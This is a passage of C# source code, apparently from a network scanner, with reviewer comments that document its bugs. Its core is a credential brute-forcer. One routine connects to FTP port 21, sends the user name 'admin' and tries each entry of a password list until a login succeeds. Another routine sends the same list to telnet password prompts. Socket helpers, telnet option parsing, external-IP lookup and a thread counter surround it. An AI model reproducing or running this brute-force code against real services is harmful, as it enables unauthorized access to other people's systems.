        /// control connection, each answered with 530; a per-connection or per-address
        /// failed-login limit ends the run.
        /// </remarks>
        public static void ftptry(string myip)
        {
            Console.WriteLine("ftptry");

            // Single 1 KiB buffer reused for every reply; a longer reply is read only partially.
            byte[] data = new byte[1024];
            string stringdata;
            int recv;

            // Parse, Connect and the first Receive sit outside any try block: a malformed
            // address or an unreachable host propagates to the caller, and in the Connect /
            // Receive case the socket is not closed on that path.
            IPAddress adresseIP = IPAddress.Parse(myip);
            IPEndPoint ip = new IPEndPoint(adresseIP, 21);
            Socket Sock_scan = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
            Sock_scan.Connect(ip);

            recv = Sock_scan.Receive(data);
            Console.WriteLine("Banner ftp: " + Encoding.ASCII.GetString(data, 0, recv));

            foreach (string password in passwords)
            {
                try
                {
                    Console.WriteLine("{0} -> USER", myip);
                    // "USER admin\r\n" assembled from character codes 32 (space), 13 (CR), 10 (LF).
                    Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("USER" + Convert.ToChar(32) + "admin" + Convert.ToChar(13) + Convert.ToChar(10)));
                    recv = Sock_scan.Receive(data);
                    // The server text is concatenated into the format string, so a reply that
                    // contains '{' or '}' makes WriteLine throw FormatException (caught below).
                    Console.WriteLine("{0} -> Response ftp: " + Encoding.ASCII.GetString(data, 0, recv), myip);
                    //331 Please specify the password.
                    //331 Enter PASS command
                    //331 User name okay, need password.

                    Console.WriteLine("{0} -> PASS", myip);
                    Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("PASS" + Convert.ToChar(32) + password + Convert.ToChar(13) + Convert.ToChar(10)));
                    recv = Sock_scan.Receive(data);
                    stringdata = Encoding.ASCII.GetString(data, 0, recv);
                    Console.WriteLine("{0} -> Response ftp: " + stringdata, myip);
                    //530 Login incorrect.
                    //530 Not logged in.
                    //530 User admin cannot log in.
                    // Substring match on the whole reply: "530" or "230" anywhere in the text
                    // counts, not only as the leading reply code.
                    if (stringdata.Contains("530"))
                    {
                        Console.Write("{0} -> bad ftp password: {1}\n", myip, password);
                    }
                    //230 User logged in, proceed.
                    if (stringdata.Contains("230"))
                    {
                        Console.Write("{0} -> FTP PASSWORD IS: {1}\n", myip, password);
                        break;
                    }

                }
                catch (Exception e)
                {
                    // Any failure (socket error, format error) is logged and the loop simply
                    // continues with the next entry on the same socket.
                    Console.WriteLine("{0} -> " + e.Message, myip);
                }
            }

            Sock_scan.Close();

            // Disabled alternative based on FtpWebRequest. Block comments do not nest in C#,
            // so the whole region ends at the first closing marker below.
            /*
            FtpWebRequest reqFTP;
            reqFTP = (FtpWebRequest)FtpWebRequest.Create(new Uri("ftp://" + myip+"/"));
            reqFTP.Credentials = new NetworkCredential("login", "pass");
            reqFTP.KeepAlive = false;
            reqFTP.Method = WebRequestMethods.Ftp.ListDirectory;
            // Get the FTP server's response
            FtpWebResponse response = (FtpWebResponse)reqFTP.GetResponse();
            Console.WriteLine("{0} -> Réponse FTP:" + response, myip);

        /*
            // Get the response stream
            StreamReader monStreamReader = new StreamReader(response.GetResponseStream(), Encoding.Default);
            // Store the listing in a string
            string listeBrute = monStreamReader.ReadToEnd();
            // Split the string into its individual file entries
            string[] liste = listeBrute.Split(Environment.NewLine.ToCharArray()[0]);
            // Return the directory listing
            //return liste;
        */


        }

/*
        public static void ConnectCallback(IAsyncResult ar)
        {
            try
            {
                // Get The connection socket from the callback
                Socket sock1 = (Socket)ar.AsyncState;
                sock1.Blocking = false; // This is a non blocking IO
                if (sock1.Connected)
                {
                    // Define a new Callback to read the data 
                    AsyncCallback recieveData = new AsyncCallback(OnRecievedData);
                    // Begin reading data asyncronously
                    sock1.BeginReceive(m_byBuff, 0, m_byBuff.Length, SocketFlags.None, recieveData, sock1);
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex.Message, "Setup Recieve callbackProc failed!");
            }
        }
*/

        /// <summary>
        /// Completion callback for an asynchronous connect. Finishes the connect on the
        /// socket carried in <c>ar.AsyncState</c>, logs the remote endpoint and sets the
        /// <c>connectDone</c> event (declared outside this view).
        /// </summary>
        /// <param name="ar">Async result whose state object is the connecting Socket.</param>
        /// <remarks>
        /// When EndConnect throws, the exception is only logged and <c>connectDone</c> is
        /// never set; a caller waiting on it without a timeout would not be released
        /// (the waiting code is not visible here).
        /// </remarks>
        private static void ConnectCallback(IAsyncResult ar)
        {
            try
            {
                // The socket was handed over as the state object of the connect call.
                Socket connecting = (Socket)ar.AsyncState;
                connecting.EndConnect(ar);

                string remote = connecting.RemoteEndPoint.ToString();
                Console.WriteLine("Socket connected to {0}", remote);

                // Release whoever is waiting for the connection.
                connectDone.Set();

                Console.WriteLine("DEBUG ConnectCallback");
            }
            catch (Exception failure)
            {
                Console.WriteLine("ERROR ConnectCallback: " + failure.ToString());
            }
        }

        /// <summary>
        /// Starts an asynchronous receive on <paramref name="client"/>, using a fresh
        /// <c>StateObject</c> as buffer holder and <c>ReceiveCallback</c> as completion handler.
        /// </summary>
        /// <param name="client">Socket to read from.</param>
        /// <remarks>Any exception is written to the console and not rethrown.</remarks>
        private static void Receive(Socket client)
        {
            try
            {
                // Per-receive state: the socket plus the buffer the data lands in.
                StateObject pending = new StateObject();
                pending.workSocket = client;

                AsyncCallback onData = new AsyncCallback(ReceiveCallback);
                client.BeginReceive(pending.buffer, 0, StateObject.BufferSize, SocketFlags.None, onData, pending);
            }
            catch (Exception failure)
            {
                Console.WriteLine(failure.ToString());
            }
        }

        /// <summary>
        /// Completion callback for <c>BeginReceive</c>. Appends each received chunk, decoded
        /// as ASCII, to the state object's StringBuilder and re-arms the receive; when the
        /// peer has closed (zero bytes) it publishes the accumulated text in <c>response</c>
        /// and sets <c>receiveDone</c> (both declared outside this view).
        /// </summary>
        /// <param name="ar">Async result whose state object is the <c>StateObject</c> of this receive.</param>
        /// <remarks>
        /// The accumulated text has no size limit, so the remote peer decides how much memory
        /// is used. <c>response</c> is only assigned when more than one character arrived.
        /// An exception is logged and leaves <c>receiveDone</c> unset.
        /// </remarks>
        private static void ReceiveCallback(IAsyncResult ar)
        {
            try
            {
                StateObject pending = (StateObject)ar.AsyncState;
                Socket source = pending.workSocket;

                int received = source.EndReceive(ar);

                if (received <= 0)
                {
                    // Nothing more will arrive: hand the collected text over and signal.
                    if (pending.sb.Length > 1)
                    {
                        response = pending.sb.ToString();
                    }
                    receiveDone.Set();
                    return;
                }

                // Keep what arrived so far, then ask for the next chunk.
                string chunk = Encoding.ASCII.GetString(pending.buffer, 0, received);
                pending.sb.Append(chunk);

                AsyncCallback onData = new AsyncCallback(ReceiveCallback);
                source.BeginReceive(pending.buffer, 0, StateObject.BufferSize, SocketFlags.None, onData, pending);
            }
            catch (Exception failure)
            {
                Console.WriteLine(failure.ToString());
            }
        }


        /// <summary>
        /// Carries the state of one asynchronous receive: the socket, a fixed-size
        /// byte buffer and the text collected so far.
        /// </summary>
        public class StateObject
        {
            /// <summary>Length in bytes of <see cref="buffer"/>.</summary>
            public const int BufferSize = 256;

            /// <summary>Socket the receive runs on; null until the caller assigns it.</summary>
            public Socket workSocket;

            /// <summary>Buffer each receive call writes into.</summary>
            public byte[] buffer = new byte[BufferSize];

            /// <summary>Text decoded from all chunks received so far.</summary>
            public StringBuilder sb = new StringBuilder();
        }






        /// <summary>
        /// Separates telnet option sequences from displayable text. The bytes are widened
        /// to characters one by one, then the text is scanned for the IAC marker: text in
        /// front of a marker goes to the display string, DO/DONT/WILL/WONT triples and
        /// SB..SE runs are added to <c>m_ListOptions</c>. IAC, DO, DONT, WILL, WONT, SB, SE
        /// and <c>m_ListOptions</c> are declared outside this view.
        /// </summary>
        /// <param name="m_strLineToProcess">Bytes to scan; the visible caller passes data received from the remote peer.</param>
        /// <returns>
        /// The displayable text, or the empty string when any exception was thrown
        /// (the result variable is assigned only after the scan loop completes).
        /// </returns>
        private static string ProcessOptions(byte[] m_strLineToProcess)
        {
            string m_DISPLAYTEXT = "";
            string m_strTemp = "";
            string m_strOption = "";
            string m_strNormalText = "";
            bool bScanDone = false;
            int ndx = 0;
            int ldx = 0;
            char ch;
            try
            {
                // Byte-to-char widening (value 0..255 kept as is); quadratic string concatenation.
                for (int i = 0; i < m_strLineToProcess.Length; i++)
                {
                    Char ss = Convert.ToChar(m_strLineToProcess[i]);
                    m_strTemp = m_strTemp + Convert.ToString(ss);
                }

                while (bScanDone != true)
                {
                    int lensmk = m_strTemp.Length;
                    ndx = m_strTemp.IndexOf(Convert.ToString(IAC));
                    // IndexOf never returns a value above the string length, so this guard cannot fire.
                    if (ndx > lensmk)
                        ndx = m_strTemp.Length;

                    if (ndx != -1)
                    {
                        m_DISPLAYTEXT += m_strTemp.Substring(0, ndx);
                        // NOTE(review): when IAC is the last character this index is out of
                        // range; the exception lands in the catch below and "" is returned.
                        ch = m_strTemp[ndx + 1];
                        if (ch == DO || ch == DONT || ch == WILL || ch == WONT)
                        {
                            // NOTE(review): Substring(ndx, 3) throws when fewer than three
                            // characters remain after the marker.
                            m_strOption = m_strTemp.Substring(ndx, 3);
                            string txt = m_strTemp.Substring(ndx + 3);
                            // NOTE(review): the prefix was already appended above, so it is
                            // added to the display text a second time here.
                            m_DISPLAYTEXT += m_strTemp.Substring(0, ndx);
                            m_ListOptions.Add(m_strOption);
                            m_strTemp = txt;
                        }
                        else
                            if (ch == IAC)
                            {
                                // Assignment, not append: text collected in earlier iterations is dropped.
                                m_DISPLAYTEXT = m_strTemp.Substring(0, ndx);
                                m_strTemp = m_strTemp.Substring(ndx + 1);
                            }
                            else
                                if (ch == SB)
                                {
                                    // Assignment, not append, as in the branch above.
                                    m_DISPLAYTEXT = m_strTemp.Substring(0, ndx);
                                    ldx = m_strTemp.IndexOf(Convert.ToString(SE));
                                    // NOTE(review): ldx is an index but is passed as a length;
                                    // it is -1 when no SE is present, which makes Substring throw.
                                    m_strOption = m_strTemp.Substring(ndx, ldx);
                                    m_ListOptions.Add(m_strOption);
                                    m_strTemp = m_strTemp.Substring(ldx);
                                }
                        // NOTE(review): when the character after IAC matches none of the
                        // branches, m_strTemp is left unchanged and the loop never ends.
                        // The input comes from the peer, so the peer can trigger this.
                    }
                    else
                    {
                        // No marker left: the remainder is plain text.
                        m_DISPLAYTEXT = m_DISPLAYTEXT + m_strTemp;
                        bScanDone = true;
                    }
                }
                m_strNormalText = m_DISPLAYTEXT;
            }
            catch (Exception eP)
            {
                // The exception message is passed as the composite format string and the
                // literal as its argument, so the literal is printed only if the message
                // happens to contain a {0} placeholder.
                Console.WriteLine(eP.Message, "Application Error!!!");
                //Application.Exit();
            }
            return m_strNormalText;
        }

        /// <summary>
        /// Completion callback for an asynchronous receive into <c>m_byBuff</c> (declared
        /// outside this view). Normalises line endings, strips telnet options through
        /// <c>ProcessOptions</c>, prints the text and, when it contains "Password:", sends
        /// every entry of <c>passwords</c> on the socket and prints each reply. With zero
        /// bytes received the socket is shut down and closed.
        /// </summary>
        /// <param name="ar">Async result whose state object is the receiving Socket.</param>
        /// <remarks>
        /// EndReceive sits outside any try block, so a socket error propagates out of the
        /// callback. Peer-controlled text and candidate passwords are written to the console.
        /// </remarks>
        public static void OnRecievedData(IAsyncResult ar)
        {
            // Get The connection socket from the callback
            Socket sock = (Socket)ar.AsyncState;
            sock.Blocking = false; // This is a non blocking IO
            // Get The data , if any
            int nBytesRec = sock.EndReceive(ar);
            if (nBytesRec > 0)
            {
                // sRecieved is decoded but not used below.
                string sRecieved = Encoding.ASCII.GetString(m_byBuff, 0, nBytesRec);
                string m_strLine = "";
                string myline = null;
                // Rewrite line endings: CR becomes CR LF, a bare LF is dropped.
                for (int i = 0; i < nBytesRec; i++)
                {
                    Char ch = Convert.ToChar(m_byBuff[i]);
                    switch (ch)
                    {
                        case '\r':
                            m_strLine += Convert.ToString("\r\n");
                            break;
                        case '\n':
                            break;
                        default:
                            m_strLine += Convert.ToString(ch);
                            break;
                    }
                }
                try
                {
                    int strLinelen = m_strLine.Length;
                    if (strLinelen == 0)
                    {
                        m_strLine = Convert.ToString("\r\n");
                    }

                    // Sized with the length captured before the replacement above, so the
                    // array stays empty in the strLinelen == 0 case.
                    Byte[] mToProcess = new Byte[strLinelen];
                    for (int i = 0; i < strLinelen; i++)
                        mToProcess[i] = Convert.ToByte(m_strLine[i]);
                    // Process the incoming data
                    string mOutText = ProcessOptions(mToProcess);
                    //if (mOutText != "")
                    //    textBox1.AppendText(mOutText);
                        myline+=mOutText;
                    //Console.WriteLine("Received data: {0}", mOutText);

                    // Respond to any incoming commands
                    //RespondToOptions();
                }
                catch (Exception ex)
                {
                    //Object x = this;
                    // The message is used as the format string; the literal is only an argument.
                    Console.WriteLine(ex.Message, "Information!");
                }
                Console.WriteLine("Received data: {0}", myline);


                // NOTE(review): myline is still null when the try block above failed before
                // the append; Contains then throws NullReferenceException out of the callback.
                if (myline.Contains("Password:"))
                {
                    foreach (string password in passwords)
                    {
                        Thread.Sleep(100);
                        try
                        {
                            //Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(password + Convert.ToChar(13) + Convert.ToChar(10)));
                            sock.Send(System.Text.Encoding.ASCII.GetBytes(password));
                            //Thread.Sleep(100);
                            byte[] data = new byte[1024];
                            //string banner;
                            int recv;
                            recv = sock.Receive(data);
                            string stringdata = Encoding.ASCII.GetString(data, 0, recv);
                            // Single-argument overload: "{0}" is printed literally, no address is shown.
                            Console.WriteLine("{0} -> Response telnet: " + stringdata);

                            ///*
                            //strRetPage = null;
                            //bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
                            //strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);

                            //while (bytes > 0)
                            //{
                            //    bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
                            //    strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
                            //}
                            //Console.WriteLine("Response telnet: " + strRetPage);
                            //*

                            //Bad Password!!!
                            if (stringdata.Contains("*") || stringdata.Contains("Password:") || stringdata.Contains("Bad Password"))
                            {
                                // NOTE(review): the format string names {1} but only one
                                // argument is supplied, so this call throws FormatException,
                                // which the catch below reports.
                                Console.Write("{0} -> bad telnet password: {1}\n", password);
                            }
                        }
                        catch (Exception e)
                        {
                            // Single-argument overload again: "{0}" appears literally in the output.
                            Console.WriteLine("{0} -> " + e.Message);
                        }
                    }

                }



            }
            else
            {
                // If no data was recieved then the connection is probably dead
                // The format string has no placeholder, so the endpoint argument is not printed.
                Console.WriteLine("Disconnected", sock.RemoteEndPoint);
                sock.Shutdown(SocketShutdown.Both);
                sock.Close();
            }
        }
        
        /// <summary>
        /// Resolves the local host name and returns the last IPv4 address in the
        /// resulting address list.
        /// </summary>
        /// <returns>The address as text, or the empty string when the list holds no IPv4 entry.</returns>
        public string LocalIPAddress()
        {
            string lastIPv4 = "";
            IPAddress[] candidates = Dns.GetHostEntry(Dns.GetHostName()).AddressList;

            for (int i = 0; i < candidates.Length; i++)
            {
                // Later matches overwrite earlier ones, so the last IPv4 entry wins.
                if (candidates[i].AddressFamily == AddressFamily.InterNetwork)
                {
                    lastIPv4 = candidates[i].ToString();
                }
            }

            return lastIPv4;
        }

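        /// <summary>
        /// Downloads the body of a fixed "what is my IP" URL and parses it as an IP address.
        /// </summary>
        /// <returns>The address parsed from the response body.</returns>
        /// <exception cref="FormatException">
        /// The download failed (the WebException is only logged, leaving an empty body)
        /// or the body is not a valid IP address.
        /// </exception>
        /// <remarks>
        /// The request uses plain HTTP, so the answer is unauthenticated and can be altered
        /// in transit; IPAddress.Parse is the only validation applied to it.
        /// </remarks>
        public static IPAddress GetExternalIp()
        {
            string whatIsMyIp = "http://www.whatismyip.com/automation/n09230945.asp";
            string requestHtml = "";

            // Dispose the client on every path; the original never released it.
            using (WebClient wc = new WebClient())
            {
                try
                {
                    requestHtml = Encoding.UTF8.GetString(wc.DownloadData(whatIsMyIp));
                }
                catch (WebException we)
                {
                    // Logged only; the empty body then fails in Parse below.
                    Console.Write(we.ToString());
                }
            }

            // Trim so that a trailing line break in the body does not fail the parse.
            IPAddress externalIp = IPAddress.Parse(requestHtml.Trim());
            return externalIp;
        }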

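        /// <summary>
        /// Reads the page at checkip.dyndns.org, strips the fixed HTML wrapper around the
        /// address and parses what remains as an IP address.
        /// </summary>
        /// <returns>The address parsed from the page.</returns>
        /// <exception cref="WebException">The request failed.</exception>
        /// <exception cref="FormatException">
        /// The page does not have the expected wrapper, or the remainder is not an IP address.
        /// </exception>
        /// <remarks>
        /// The request uses plain HTTP, so the answer is unauthenticated and can be altered
        /// in transit; IPAddress.Parse is the only validation applied to it.
        /// </remarks>
        public static IPAddress GetExternalIp2()
        {
            string baseurl = "http://checkip.dyndns.org/";
            string s;

            // using blocks release client, stream and reader even when the read throws;
            // the original closed them only on the success path.
            using (WebClient client = new WebClient())
            {
                // Add a user agent header in case the requested URI contains a query.
                client.Headers.Add("user-agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)");

                using (Stream data = client.OpenRead(baseurl))
                using (StreamReader reader = new StreamReader(data))
                {
                    s = reader.ReadToEnd();
                }
            }

            // Remove the exact wrapper text, then surrounding whitespace such as a final line break.
            s = s.Replace("<html><head><title>Current IP Check</title></head><body>Current IP Address: ", "")
                 .Replace("</body></html>", "")
                 .Trim();

            IPAddress externalIp = IPAddress.Parse(s);
            return externalIp;
        }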

        /// <summary>
        /// Pulses the monitor of this instance, waking one thread that waits on it.
        /// The signature matches the <c>Compteur_thread.Lancer_Thread</c> delegate.
        /// </summary>
        /// <param name="emetteur">Sender of the event; not used.</param>
        private void Lancer_Thread(object emetteur)
        {
            // Pulse requires the caller to own the monitor, hence the lock on the same object.
            object gate = this;
            lock (gate)
            {
                Monitor.Pulse(gate);
            }
        }

        /// <summary>
        /// Integer counter whose three operations run under <c>lock (this)</c> and record
        /// the operation in progress in a state field.
        /// </summary>
        /// <remarks>
        /// Each operation waits on the monitor when it finds a conflicting operation
        /// recorded. The wait is guarded by <c>if</c>, not <c>while</c>, so the state is not
        /// re-checked after waking. Every operation stores <c>Libre</c> before it leaves the
        /// lock, so apart from the initial value (<c>Incrementer</c>) a conflicting state
        /// appears reachable only when a <c>lancer_thread</c> handler calls back into this
        /// object. Locking on <c>this</c> lets any code holding a reference take the same lock.
        /// </remarks>
        public class Compteur_thread
        {
            /// <summary>Operation currently recorded on the counter.</summary>
            public enum Operation
            {
                Incrementer = 1,
                Decrementer = 2,
                Nb_thread = 3,
                Libre = 4,
            }

            // Initial state is Incrementer, not Libre: Decrementer() or Nb_thread() called
            // before the first Incrementer() will wait for a pulse.
            Operation operation = Operation.Incrementer;

            // The counter value.
            int compteur = 0;

            /// <summary>Handler signature for <see cref="lancer_thread"/>.</summary>
            public delegate void Lancer_Thread(object emetteur);

            /// <summary>Raised by <see cref="Decrementer"/> after the counter was decreased.</summary>
            public event Lancer_Thread lancer_thread;

            /// <summary>Adds one to the counter and pulses one waiting thread.</summary>
            public void Incrementer()
            {
                lock (this)
                {
                //    Console.WriteLine("DEBUG INCREMENTER");
                    if ((operation == Operation.Decrementer) || (operation == Operation.Nb_thread))
                    {
                        try
                        {
                            //Console.WriteLine("Incrementer - Monitor.Wait()");
                            // Releases the lock until another thread pulses this object.
                            Monitor.Wait(this);
                        }
                        catch (SynchronizationLockException e)
                        {
                            Console.WriteLine(e.ToString());//, "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
                        }
                        catch (ThreadInterruptedException e)
                        {
                            Console.WriteLine(e.ToString());//, "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
                        }
                    }

                    //Console.WriteLine("Incrementer");

                    operation = Operation.Incrementer;
                    compteur++;

                    Monitor.Pulse(this);
                    operation = Operation.Libre;
                }
            }

            /// <summary>
            /// Subtracts one from the counter, raises <see cref="lancer_thread"/> and pulses
            /// one waiting thread.
            /// </summary>
            public void Decrementer()
            {
                lock (this)
                {
                //    Console.WriteLine("DEBUG DECREMENTER");
                    if ((operation == Operation.Incrementer) || (operation == Operation.Nb_thread))
                    {
                        try
                        {
                            //Console.WriteLine("decrementer - Monitor.Wait()");
                            // Releases the lock until another thread pulses this object.
                            Monitor.Wait(this);
                        }
                        catch (SynchronizationLockException e)
                        {
                            Console.WriteLine(e.ToString());//, "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
                        }
                        catch (ThreadInterruptedException e)
                        {
                            Console.WriteLine(e.ToString());//, "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
                        }
                    }
                    //Console.WriteLine("decrementer");

                    operation = Operation.Decrementer;
                    compteur--;

                    // Handlers run while this lock is held and while the state still reads Decrementer.
                    if (lancer_thread != null)
                        lancer_thread(this);

                    Monitor.Pulse(this);
                    operation = Operation.Libre;
                }
            }

            /// <summary>Copies the current counter value into <paramref name="nb"/>.</summary>
            /// <param name="nb">Receives the counter value.</param>
            public void Nb_thread(out int nb)
            {
                lock (this)
                {
                //    Console.WriteLine("DEBUG NB_THREAD");
                    if ((operation == Operation.Incrementer) || (operation == Operation.Decrementer))
                    {
                        try
                        {
                            //Console.WriteLine("Nb_thread - Monitor.Wait()");
                            // Releases the lock until another thread pulses this object.
                            Monitor.Wait(this);
                        }
                        catch (SynchronizationLockException e)
                        {
                            Console.WriteLine(e.ToString());//, "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
                        }
                        catch (ThreadInterruptedException e)
                        {
                            Console.WriteLine(e.ToString());//, "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
                        }
                    }

                    //Console.WriteLine("Nb_Thread classe");

                    operation = Operation.Nb_thread;
                    nb = compteur;

                    Monitor.Pulse(this);
                    operation = Operation.Libre;
                }
            }
        }

    }    



}